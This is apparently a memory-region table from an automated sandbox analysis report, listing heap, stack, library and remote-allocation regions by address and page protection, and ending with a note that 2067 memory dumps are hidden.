page read and write
18E5AA71000
heap
page read and write
29C1E25D000
heap
page read and write
1840CB5F000
heap
page read and write
27DB7330000
heap
page read and write
59D40FE000
stack
page read and write
29C1E76D000
heap
page read and write
27DB732C000
heap
page read and write
29C1C4C8000
heap
page read and write
27DB6F9B000
heap
page read and write
2D55000
heap
page read and write
231CEEB0000
trusted library allocation
page read and write
29C1E2D5000
heap
page read and write
182AE3A9000
heap
page read and write
1F505C48000
heap
page read and write
29C1E3CC000
heap
page read and write
27DB7036000
heap
page read and write
4D200FE000
stack
page read and write
1E1230F0000
heap
page read and write
7FFC23C61000
unkown
page execute read
1AFAEC02000
heap
page read and write
27DB5079000
heap
page read and write
18E5AB44000
heap
page read and write
F9A797E000
stack
page read and write
BD0000
remote allocation
page read and write
29C1E942000
heap
page read and write
29C1E2E4000
heap
page read and write
18E5AC14000
heap
page read and write
29C1E732000
heap
page read and write
29C1E221000
heap
page read and write
7FF6434E6000
unkown
page write copy
29C1E39D000
heap
page read and write
18E5A64C000
heap
page read and write
27DB7044000
heap
page read and write
325C000
stack
page read and write
EE6AEF8000
stack
page read and write
29C1E240000
heap
page read and write
A4E000
heap
page read and write
27DB7316000
heap
page read and write
1B09F413000
heap
page read and write
18E5A63E000
heap
page read and write
29C1E732000
heap
page read and write
182AE280000
heap
page read and write
7FF79749A000
unkown
page readonly
18E5AA71000
heap
page read and write
3159000
heap
page read and write
21271D65000
heap
page read and write
BCC000
stack
page read and write
29C1E3C2000
heap
page read and write
18E58740000
remote allocation
page read and write
18E5A6BD000
heap
page read and write
29C1E661000
heap
page read and write
2DF0000
trusted library allocation
page read and write
7FF796FB0000
unkown
page readonly
1AFAF402000
trusted library allocation
page read and write
18E5AA71000
heap
page read and write
18E5A75D000
heap
page read and write
29C1E467000
heap
page read and write
27DB702D000
heap
page read and write
18E5A81C000
heap
page read and write
29C1E6B1000
heap
page read and write
3340000
trusted library allocation
page read and write
2AC33049000
heap
page read and write
1E123129000
heap
page read and write
29C1E2CB000
heap
page read and write
18E5A6BC000
heap
page read and write
27DB6F95000
heap
page read and write
2852F85A000
heap
page read and write
2AC33027000
heap
page read and write
18E5AB50000
heap
page read and write
18E5878E000
heap
page read and write
27DB6F9B000
heap
page read and write
1B09F437000
heap
page read and write
29C1E35E000
heap
page read and write
27858D00000
heap
page read and write
29C1E957000
heap
page read and write
2AC3306C000
heap
page read and write
29C1E674000
heap
page read and write
7FFC23575000
unkown
page readonly
221E5A93000
heap
page read and write
2C8E000
stack
page read and write
56D1AEB000
stack
page read and write
18E5A826000
heap
page read and write
27DB6F11000
heap
page read and write
27DB7046000
heap
page read and write
27DB69C0000
heap
page read and write
7FF796FB1000
unkown
page execute read
1AFAEB90000
remote allocation
page read and write
29C1E729000
heap
page read and write
27DB7271000
heap
page read and write
1F505B70000
unkown
page read and write
29C1E2C6000
heap
page read and write
21271960000
unkown
page readonly
29C1E908000
heap
page read and write
C10000
trusted library allocation
page read and write
29C1E45C000
heap
page read and write
221E5A8C000
heap
page read and write
29C1E221000
heap
page read and write
27DB6E98000
heap
page read and write
307C000
stack
page read and write
29812600000
heap
page read and write
30BF000
heap
page read and write
18E587A2000
heap
page read and write
7FF6434ED000
unkown
page readonly
18E5AB59000
heap
page read and write
27DB50BC000
heap
page read and write
BC0000
remote allocation
page read and write
29C1E39D000
heap
page read and write
AC0000
heap
page read and write
1EEDC3E5000
heap
page read and write
18E5ABA4000
heap
page read and write
2719C15B000
heap
page read and write
29C1E2C6000
heap
page read and write
29C1E3DA000
heap
page read and write
2E17000
heap
page read and write
29C1E276000
heap
page read and write
7FF796FB0000
unkown
page readonly
2852F7B0000
trusted library allocation
page read and write
7FF7974E4000
unkown
page read and write
2DDE000
stack
page read and write
EE6A7FE000
stack
page read and write
18E5AB80000
heap
page read and write
EBBE2FE000
stack
page read and write
29C1E729000
heap
page read and write
18E5A69D000
heap
page read and write
806CD4A000
stack
page read and write
806E1F8000
stack
page read and write
2E01000
heap
page read and write
27DB50BF000
heap
page read and write
18E5AA71000
heap
page read and write
5AAAEFF000
stack
page read and write
2AC3306E000
heap
page read and write
D0237FF000
stack
page read and write
29C1E2DF000
heap
page read and write
1F505C13000
heap
page read and write
2AC33030000
heap
page read and write
29C1E355000
heap
page read and write
18E58758000
heap
page read and write
18E5A699000
heap
page read and write
18E5AC3D000
heap
page read and write
29C1C584000
heap
page read and write
29C1DDB0000
heap
page read and write
1E1230F5000
heap
page read and write
1778217E000
heap
page read and write
1F505E40000
heap
page read and write
29C1C536000
heap
page read and write
18E5AAA8000
heap
page read and write
221E5A87000
heap
page read and write
2DF0000
remote allocation
page read and write
BF0000
remote allocation
page read and write
27DB6FBB000
heap
page read and write
3167000
heap
page read and write
30BE000
heap
page read and write
29C1E45C000
heap
page read and write
1F505E39000
heap
page read and write
18E5A77C000
heap
page read and write
7FF642FB0000
unkown
page readonly
27DB6E15000
heap
page read and write
3137000
heap
page read and write
18E5A755000
heap
page read and write
18E587F7000
heap
page read and write
18E5A611000
heap
page read and write
18E5A710000
heap
page read and write
18E5A764000
heap
page read and write
18E5AB50000
heap
page read and write
18E587DA000
heap
page read and write
2D59000
heap
page read and write
27DB6FBC000
heap
page read and write
29C1E692000
heap
page read and write
29C1E3A2000
heap
page read and write
27DB7348000
heap
page read and write
2E20000
heap
page read and write
2AC33060000
heap
page read and write
18E5AB39000
heap
page read and write
221E5DB0000
heap
page read and write
18E5A6C7000
heap
page read and write
27DB6F99000
heap
page read and write
29C1E729000
heap
page read and write
56D217B000
stack
page read and write
18E5A82D000
heap
page read and write
33B9000
heap
page read and write
18E5AC3F000
heap
page read and write
29C1E2DE000
heap
page read and write
303D000
stack
page read and write
18E5AB39000
heap
page read and write
2852F918000
heap
page read and write
18E5A66A000
heap
page read and write
1EEDC278000
heap
page read and write
1F505C4B000
heap
page read and write
BC0000
remote allocation
page read and write
29C1E729000
heap
page read and write
27DB6FC6000
heap
page read and write
315F000
heap
page read and write
1B09F42E000
heap
page read and write
231CE1A0000
heap
page read and write
29C1E6CA000
heap
page read and write
18E5ABDA000
heap
page read and write
29370FE000
stack
page read and write
1840CB62000
heap
page read and write
2D4E000
stack
page read and write
27DB704C000
heap
page read and write
1EEDCB6D000
heap
page read and write
A91FDF4000
stack
page read and write
29C1E3C9000
heap
page read and write
18E5A822000
heap
page read and write
2852F7D0000
trusted library allocation
page read and write
27DB7027000
heap
page read and write
29C1E362000
heap
page read and write
17782120000
heap
page read and write
18E5AD29000
heap
page read and write
316F000
heap
page read and write
18E5AAF0000
heap
page read and write
18E5AC3C000
heap
page read and write
27DB6F9B000
heap
page read and write
7FF797397000
unkown
page readonly
27DB6E83000
heap
page read and write
7FF642FB1000
unkown
page execute read
29C1E66A000
heap
page read and write
7FF7974ED000
unkown
page readonly
27DB733C000
heap
page read and write
7FF6434E4000
unkown
page write copy
7FF64349A000
unkown
page readonly
7FF797397000
unkown
page readonly
2E01000
heap
page read and write
29C1E28F000
heap
page read and write
18E5AD25000
heap
page read and write
29C1E72B000
heap
page read and write
29C1E2AC000
heap
page read and write
27DB7277000
heap
page read and write
374C27B000
stack
page read and write
1C82BB02000
heap
page read and write
18E5A64C000
heap
page read and write
221E5A93000
heap
page read and write
18E5ABCD000
heap
page read and write
A91F4FE000
stack
page read and write
27DB702D000
heap
page read and write
29C1E45D000
heap
page read and write
31FE000
stack
page read and write
27DB733F000
heap
page read and write
18E5A77D000
heap
page read and write
17782170000
heap
page read and write
18E5A82F000
heap
page read and write
18E58740000
remote allocation
page read and write
18E5AB3A000
heap
page read and write
2FF0000
heap
page read and write
18E5AC3C000
heap
page read and write
29032113000
heap
page read and write
29C1E354000
heap
page read and write
27858429000
heap
page read and write
33C7000
heap
page read and write
A91F8FE000
stack
page read and write
18E587AF000
heap
page read and write
34D9000
heap
page read and write
29C1E7F9000
heap
page read and write
27DB703F000
heap
page read and write
29C1C370000
remote allocation
page read and write
A91EB8A000
stack
page read and write
27DB6E90000
heap
page read and write
18E5A611000
heap
page read and write
573E0FD000
stack
page read and write
231CEF00000
trusted library allocation
page read and write
1C82BA25000
heap
page read and write
29C1E3A3000
heap
page read and write
32C0000
remote allocation
page read and write
1F505C48000
heap
page read and write
18E5A76E000
heap
page read and write
2AC33085000
heap
page read and write
27DB6E7B000
heap
page read and write
29C1E69D000
heap
page read and write
7FF6FC45A000
unkown
page readonly
21271D69000
heap
page read and write
7FF7974E4000
unkown
page write copy
29C1E912000
heap
page read and write
1EEDC292000
heap
page read and write
374C77E000
stack
page read and write
237F5822000
heap
page read and write
29C1E244000
heap
page read and write
480000
heap
page read and write
29C1E6E0000
heap
page read and write
1C82B7D0000
heap
page read and write
1EEDC38E000
heap
page read and write
27DB6FA3000
heap
page read and write
18E5A75F000
heap
page read and write
18E5A6DD000
heap
page read and write
18E5A81C000
heap
page read and write
18E5A824000
heap
page read and write
29C1E4ED000
heap
page read and write
18E5AA77000
heap
page read and write
18E5A711000
heap
page read and write
2AC3307B000
heap
page read and write
1EEDCB14000
heap
page read and write
9B7000
heap
page read and write
2D5E000
stack
page read and write
34E2000
heap
page read and write
2AC33045000
heap
page read and write
29C1E667000
heap
page read and write
45926FD000
stack
page read and write
7FF7974ED000
unkown
page readonly
F6F37FE000
stack
page read and write
18E5AAF0000
heap
page read and write
18E5A629000
heap
page read and write
1E1230F9000
heap
page read and write
459247E000
stack
page read and write
1840CBA0000
heap
page read and write
18E5AA9B000
heap
page read and write
18E5AA89000
heap
page read and write
1E808BB5000
heap
page read and write
51A0000
trusted library allocation
page read and write
29C1E81D000
heap
page read and write
29C1E277000
heap
page read and write
1F505C06000
heap
page read and write
7FF643397000
unkown
page readonly
27DB6F95000
heap
page read and write
F9A70FB000
stack
page read and write
18E5A75D000
heap
page read and write
3030000
heap
page read and write
34C0000
heap
page read and write
1C82BA13000
heap
page read and write
29C1EAC9000
heap
page read and write
806DBFE000
stack
page read and write
18E5A81C000
heap
page read and write
29C1C524000
heap
page read and write
18E5ABA4000
heap
page read and write
1F505BD0000
heap
page read and write
29C1E6B3000
heap
page read and write
A91EEFE000
stack
page read and write
18E5ABCD000
heap
page read and write
1E808B70000
heap
page read and write
1F505C74000
heap
page read and write
18E5A6F4000
heap
page read and write
29C1E2C6000
heap
page read and write
27DB6E31000
heap
page read and write
7FF6FC4AD000
unkown
page readonly
2D50000
heap
page read and write
29C1E484000
heap
page read and write
3151000
heap
page read and write
A91F2FF000
stack
page read and write
29C1E334000
heap
page read and write
3159000
heap
page read and write
29C1E39D000
heap
page read and write
1EEDC26D000
heap
page read and write
1EEDCB0A000
heap
page read and write
18E5A75D000
heap
page read and write
182AE388000
heap
page read and write
29812E02000
trusted library allocation
page read and write
21271C00000
heap
page read and write
459257D000
stack
page read and write
29C1E464000
heap
page read and write
EE6A8FE000
stack
page read and write
29C1E3CC000
heap
page read and write
29C1E229000
heap
page read and write
18E5A826000
heap
page read and write
231CE180000
heap
page read and write
B0E000
stack
page read and write
573E5FE000
stack
page read and write
27DB4EF0000
remote allocation
page read and write
18E5AB31000
heap
page read and write
29C1E4C9000
heap
page read and write
27DB6EBB000
heap
page read and write
27DB72E3000
heap
page read and write
27DB6E54000
heap
page read and write
1B09F402000
heap
page read and write
EBBE3FC000
stack
page read and write
29C1EAB2000
heap
page read and write
221E5A82000
heap
page read and write
7CF000
stack
page read and write
27858400000
heap
page read and write
A56000
heap
page read and write
4D1FBFE000
unkown
page read and write
29374FF000
stack
page read and write
29C1E354000
heap
page read and write
27DB6FBB000
heap
page read and write
1AFAEAD0000
heap
page read and write
29C1E26A000
heap
page read and write
29C1E6DD000
heap
page read and write
29C1E69A000
heap
page read and write
1F505BEA000
heap
page read and write
18E5A79D000
heap
page read and write
27DB6E79000
heap
page read and write
18E5AB50000
heap
page read and write
96F9EFD000
stack
page read and write
1C82BA02000
heap
page read and write
7FF6FC45A000
unkown
page readonly
1F505C01000
heap
page read and write
7FF6FBF70000
unkown
page readonly
B9C000
stack
page read and write
1EEDC860000
trusted library allocation
page read and write
18E587BF000
heap
page read and write
29C1E6E8000
heap
page read and write
29C1E2E3000
heap
page read and write
52A8000
trusted library allocation
page read and write
29C1E6F8000
heap
page read and write
18E5A644000
heap
page read and write
B6C000
stack
page read and write
18E5A66F000
heap
page read and write
27DB7434000
heap
page read and write
27DB4EA0000
heap
page read and write
F9A777E000
stack
page read and write
18E5A824000
heap
page read and write
1E808A80000
unkown
page readonly
3167000
heap
page read and write
18E587D5000
heap
page read and write
459207B000
stack
page read and write
18E5A763000
heap
page read and write
18E587FC000
heap
page read and write
29C1E68B000
heap
page read and write
18E5A759000
heap
page read and write
CCF677E000
stack
page read and write
7FF7974ED000
unkown
page readonly
18E5A77C000
heap
page read and write
1EEDC1D0000
trusted library allocation
page read and write
27DB6EEA000
heap
page read and write
5AAB07E000
stack
page read and write
314F000
stack
page read and write
29C1E69D000
heap
page read and write
27DB6F11000
heap
page read and write
182AE3A9000
heap
page read and write
527DFFE000
stack
page read and write
18E5AA77000
heap
page read and write
7FFC23C74000
unkown
page read and write
18E5A77C000
heap
page read and write
29C1E3D9000
heap
page read and write
18E5AB3F000
heap
page read and write
29C1E6D5000
heap
page read and write
7FF643397000
unkown
page readonly
1EEDCC02000
heap
page read and write
27DB6F93000
heap
page read and write
2E01000
heap
page read and write
18E5AA71000
heap
page read and write
EE69CF3000
stack
page read and write
18E5AB50000
heap
page read and write
29C1E676000
heap
page read and write
B40000
heap
page read and write
182AE397000
heap
page read and write
EBBDC7C000
stack
page read and write
29C1C54C000
heap
page read and write
27DB7399000
heap
page read and write
27DB703C000
heap
page read and write
1AFAEC57000
heap
page read and write
390000
remote allocation
page read and write
2852F902000
heap
page read and write
18E5AC3C000
heap
page read and write
18E5AB3D000
heap
page read and write
18E5AD0B000
heap
page read and write
29C1E200000
heap
page read and write
18E5A77C000
heap
page read and write
AF0000
heap
page read and write
29C1E985000
heap
page read and write
374C57B000
stack
page read and write
29C1E8FC000
heap
page read and write
3080000
trusted library allocation
page read and write
316F000
heap
page read and write
18E5A692000
heap
page read and write
27DB7525000
heap
page read and write
49C1000
trusted library allocation
page read and write
1C82BA79000
heap
page read and write
29C1E3D1000
heap
page read and write
315F000
heap
page read and write
18E5A768000
heap
page read and write
30B0000
trusted library allocation
page read and write
2AC33047000
heap
page read and write
3151000
heap
page read and write
1840CBA0000
heap
page read and write
18E5ABAF000
heap
page read and write
18E5ABDA000
heap
page read and write
27DB7014000
heap
page read and write
59D42FE000
stack
page read and write
E0B44FF000
stack
page read and write
27DB733E000
heap
page read and write
1EEDC3B9000
heap
page read and write
18E5A689000
heap
page read and write
7FFC23C70000
unkown
page readonly
27DB6E7B000
heap
page read and write
2AC3302A000
heap
page read and write
A47000
heap
page read and write
29C1E2E4000
heap
page read and write
2E20000
heap
page read and write
18E5A63B000
heap
page read and write
1F505C6D000
heap
page read and write
4D201FF000
stack
page read and write
182AE32C000
heap
page read and write
29C1E732000
heap
page read and write
1E122F20000
heap
page read and write
1840CB80000
heap
page read and write
806D8FF000
stack
page read and write
29C1E3C7000
heap
page read and write
27DB50D2000
heap
page read and write
216AF830000
heap
page read and write
29C1E660000
heap
page read and write
29C1E2E4000
heap
page read and write
27DB7112000
heap
page read and write
231CDF40000
trusted library allocation
page read and write
1B09F270000
heap
page read and write
1840CB50000
heap
page read and write
27DB6F95000
heap
page read and write
33DF000
heap
page read and write
29C1E732000
heap
page read and write
29C1E6F5000
heap
page read and write
34D9000
heap
page read and write
29C1E230000
heap
page read and write
182AE353000
heap
page read and write
18E5AA97000
heap
page read and write
27DB6FAC000
heap
page read and write
A91FFF8000
stack
page read and write
34C9000
heap
page read and write
B90000
remote allocation
page read and write
BAC000
stack
page read and write
27DB7270000
heap
page read and write
221E5E15000
heap
page read and write
28531270000
trusted library allocation
page read and write
29C1E45D000
heap
page read and write
18E5AC3F000
heap
page read and write
1E808BB9000
heap
page read and write
1840CA80000
heap
page read and write
29C1E334000
heap
page read and write
27DB6FA3000
heap
page read and write
806D4FE000
stack
page read and write
216AF4EB000
heap
page read and write
806E3F8000
stack
page read and write
2AC33061000
heap
page read and write
2AC3303B000
heap
page read and write
27DB6E6E000
heap
page read and write
18E5AA71000
heap
page read and write
1840CB53000
heap
page read and write
1EEDC213000
heap
page read and write
221E5A6B000
heap
page read and write
316F000
heap
page read and write
182AE410000
heap
page read and write
1840CB81000
heap
page read and write
27858360000
heap
page read and write
27DB727A000
heap
page read and write
29C1E4ED000
heap
page read and write
221E5AD4000
heap
page read and write
1F505C6A000
heap
page read and write
29373FE000
stack
page read and write
1E123120000
heap
page read and write
32D000
stack
page read and write
2AC3303E000
heap
page read and write
29C1E230000
heap
page read and write
34C9000
heap
page read and write
806CD43000
stack
page read and write
18E5AA78000
heap
page read and write
182AE260000
heap
page read and write
29C1E6EA000
heap
page read and write
29C1E35D000
heap
page read and write
315F000
heap
page read and write
29C1E221000
heap
page read and write
527DAFD000
stack
page read and write
1840CBA0000
heap
page read and write
27DB74F9000
heap
page read and write
1E122F60000
unkown
page readonly
29C1E45D000
heap
page read and write
2AC3307F000
heap
page read and write
7FFC23C70000
unkown
page readonly
29C1E2E4000
heap
page read and write
18E5AA77000
heap
page read and write
29C1E816000
heap
page read and write
7FF642FB0000
unkown
page readonly
1F505E35000
heap
page read and write
29C1E2C6000
heap
page read and write
29C1E729000
heap
page read and write
29C1E6B5000
heap
page read and write
F9A737F000
stack
page read and write
182AE3A9000
heap
page read and write
21271D60000
heap
page read and write
231CE369000
heap
page read and write
29C1E332000
heap
page read and write
27DB7032000
heap
page read and write
18E5ABA0000
heap
page read and write
18E5A833000
heap
page read and write
29C1C584000
heap
page read and write
18E58920000
heap
page read and write
27DB6F94000
heap
page read and write
29C1E3D1000
heap
page read and write
2E0B000
heap
page read and write
29C1E45C000
heap
page read and write
1F505B50000
unkown
page readonly
29C1E39D000
heap
page read and write
212719A0000
heap
page read and write
29C1E817000
heap
page read and write
27DB6E82000
heap
page read and write
9C6000
heap
page read and write
1F505C6B000
heap
page read and write
18E5A6DD000
heap
page read and write
29C1C524000
heap
page read and write
2719C270000
heap
page read and write
182AE550000
heap
page read and write
2D0E000
stack
page read and write
7DE000
stack
page read and write
18E5A6FA000
heap
page read and write
1F505C6D000
heap
page read and write
18E5A77C000
heap
page read and write
7FF6FC45A000
unkown
page readonly
29C1E3A2000
heap
page read and write
F9A6C9C000
stack
page read and write
7FFC23C77000
unkown
page readonly
7FF642FB1000
unkown
page execute read
B8C000
stack
page read and write
27DB737C000
heap
page read and write
29C1E965000
heap
page read and write
1840C920000
heap
page read and write
A6978FD000
stack
page read and write
237F56A0000
heap
page read and write
27DB72EB000
heap
page read and write
27DB6E21000
heap
page read and write
29C1E2E4000
heap
page read and write
1E808A90000
unkown
page read and write
27DB729F000
heap
page read and write
29C1E661000
heap
page read and write
18E5A63B000
heap
page read and write
18E5AB5C000
heap
page read and write
720000
remote allocation
page read and write
27DB7031000
heap
page read and write
27DB6F90000
heap
page read and write
3130000
heap
page read and write
3679000
heap
page read and write
29C1C56A000
heap
page read and write
2D8E000
stack
page read and write
7FF6FC4A4000
unkown
page write copy
27DB6F10000
heap
page read and write
18E5AB33000
heap
page read and write
29C1E692000
heap
page read and write
27DB733D000
heap
page read and write
2785843E000
heap
page read and write
74F000
stack
page read and write
29C1E251000
heap
page read and write
182AE3A9000
heap
page read and write
F9A767C000
stack
page read and write
1F505BA0000
heap
page read and write
17782142000
heap
page read and write
27DB733F000
heap
page read and write
1AFAEC13000
heap
page read and write
17782170000
heap
page read and write
7FF79749A000
unkown
page readonly
182AE346000
heap
page read and write
315F000
heap
page read and write
1E808BB9000
heap
page read and write
1840CB5B000
heap
page read and write
7FF6FC4A4000
unkown
page write copy
27DB6FA3000
heap
page read and write
25708930000
heap
page read and write
27DB50B8000
heap
page read and write
29C1E6F8000
heap
page read and write
27DB7549000
heap
page read and write
27DB729B000
heap
page read and write
7FFC23577000
unkown
page readonly
3151000
heap
page read and write
18E5A6BC000
heap
page read and write
29C1E45D000
heap
page read and write
1C82BA51000
heap
page read and write
221E5E10000
heap
page read and write
29C1E28F000
heap
page read and write
221E5A68000
heap
page read and write
29C1E708000
heap
page read and write
27DB702D000
heap
page read and write
29C1E26F000
heap
page read and write
34C0000
heap
page read and write
BD0000
remote allocation
page read and write
27DB6F9A000
heap
page read and write
2E0A000
heap
page read and write
316F000
heap
page read and write
27DB508D000
heap
page read and write
216AF4E0000
heap
page read and write
29C1E324000
heap
page read and write
29C1E6FC000
heap
page read and write
29C1E45C000
heap
page read and write
7FFC23574000
unkown
page read and write
27DB7036000
heap
page read and write
29C1E335000
heap
page read and write
B40E6FF000
unkown
page read and write
34A7000
heap
page read and write
29C1E207000
heap
page read and write
1B09F454000
heap
page read and write
27DB6FBF000
heap
page read and write
459277E000
stack
page read and write
1EEDC0D0000
heap
page read and write
2719C2E0000
heap
page read and write
7FF6434EB000
unkown
page read and write
1E808A70000
unkown
page readonly
27DB704C000
heap
page read and write
1F505C6C000
heap
page read and write
7FFC23C74000
unkown
page read and write
29C1E9CD000
heap
page read and write
18E5AAC8000
heap
page read and write
29812713000
heap
page read and write
27DB72BB000
heap
page read and write
18E5A737000
heap
page read and write
27DB69C5000
heap
page read and write
7FF6434ED000
unkown
page readonly
18E5AB46000
heap
page read and write
18E5A644000
heap
page read and write
18E5A611000
heap
page read and write
18E5AA9B000
heap
page read and write
18E5878C000
heap
page read and write
527DBFE000
stack
page read and write
32C0000
remote allocation
page read and write
29C1E45D000
heap
page read and write
27DB6FBB000
heap
page read and write
27DB7513000
heap
page read and write
18E587B2000
heap
page read and write
27DB732E000
heap
page read and write
1F505B10000
heap
page read and write
3151000
heap
page read and write
27DB6EEA000
heap
page read and write
1AFAEC60000
heap
page read and write
18E5A826000
heap
page read and write
29C1E816000
heap
page read and write
3167000
heap
page read and write
29C1E224000
heap
page read and write
18E5ABC5000
heap
page read and write
2981265A000
heap
page read and write
29C1E7F9000
heap
page read and write
52C000
stack
page read and write
29C1E3D1000
heap
page read and write
17782161000
heap
page read and write
182AE38E000
heap
page read and write
27DB7024000
heap
page read and write
1840CBA0000
heap
page read and write
29C1E24F000
heap
page read and write
A69747A000
stack
page read and write
18E5AA71000
heap
page read and write
29C1E68F000
heap
page read and write
18E5A81C000
heap
page read and write
29C1E6BE000
heap
page read and write
A5E000
heap
page read and write
2E20000
heap
page read and write
18E5A825000
heap
page read and write
278584E3000
heap
page read and write
29C1E334000
heap
page read and write
231CEEA0000
trusted library allocation
page read and write
29C1E499000
heap
page read and write
221E5AD4000
heap
page read and write
EE69CFA000
stack
page read and write
9AF000
stack
page read and write
2936EFB000
stack
page read and write
29C1E72B000
heap
page read and write
79E000
stack
page read and write
7FF7974E4000
unkown
page write copy
29C1E241000
heap
page read and write
216AF3D0000
heap
page read and write
1778213F000
heap
page read and write
29C1C370000
remote allocation
page read and write
18E5A63E000
heap
page read and write
29C1E260000
heap
page read and write
29C1E45F000
heap
page read and write
A6976FC000
stack
page read and write
29C1E464000
heap
page read and write
29C1E45C000
heap
page read and write
18E5AC7A000
heap
page read and write
2DCE000
stack
page read and write
17782132000
heap
page read and write
4D1FCFE000
stack
page read and write
29C1E35E000
heap
page read and write
27DB733D000
heap
page read and write
29C1E692000
heap
page read and write
7FF6FBF71000
unkown
page execute read
45925FE000
stack
page read and write
29C1E3A2000
heap
page read and write
806D0FD000
stack
page read and write
27DB7348000
heap
page read and write
550000
remote allocation
page read and write
18E5A82A000
heap
page read and write
18E5A2C5000
heap
page read and write
1AFAEB90000
remote allocation
page read and write
1778216A000
heap
page read and write
18E5880C000
heap
page read and write
27DB50D9000
heap
page read and write
29C1E68B000
heap
page read and write
1EEDCB54000
heap
page read and write
27DB751C000
heap
page read and write
2E17000
heap
page read and write
29C1E2DF000
heap
page read and write
27DB6E46000
heap
page read and write
806E5F6000
stack
page read and write
1EEDCBBC000
heap
page read and write
27DB7052000
heap
page read and write
298125C0000
trusted library allocation
page read and write
33B5000
heap
page read and write
7FFC23570000
unkown
page readonly
1840CB5F000
heap
page read and write
29C1E6D3000
heap
page read and write
FA257BE000
stack
page read and write
18E5AB3A000
heap
page read and write
237F5803000
heap
page read and write
27DB7052000
heap
page read and write
237F56C0000
heap
page read and write
18E587B8000
heap
page read and write
29C1E360000
heap
page read and write
27DB50C9000
heap
page read and write
18E587F0000
heap
page read and write
2AC33058000
heap
page read and write
29C1E71C000
heap
page read and write
27DB7047000
heap
page read and write
221E5ACE000
heap
page read and write
18E5AB50000
heap
page read and write
29C1E4DD000
heap
page read and write
29C1E366000
heap
page read and write
2DCE000
stack
page read and write
29C1E4DD000
heap
page read and write
18E5A766000
heap
page read and write
There are 2067 hidden memdumps, click here to show them.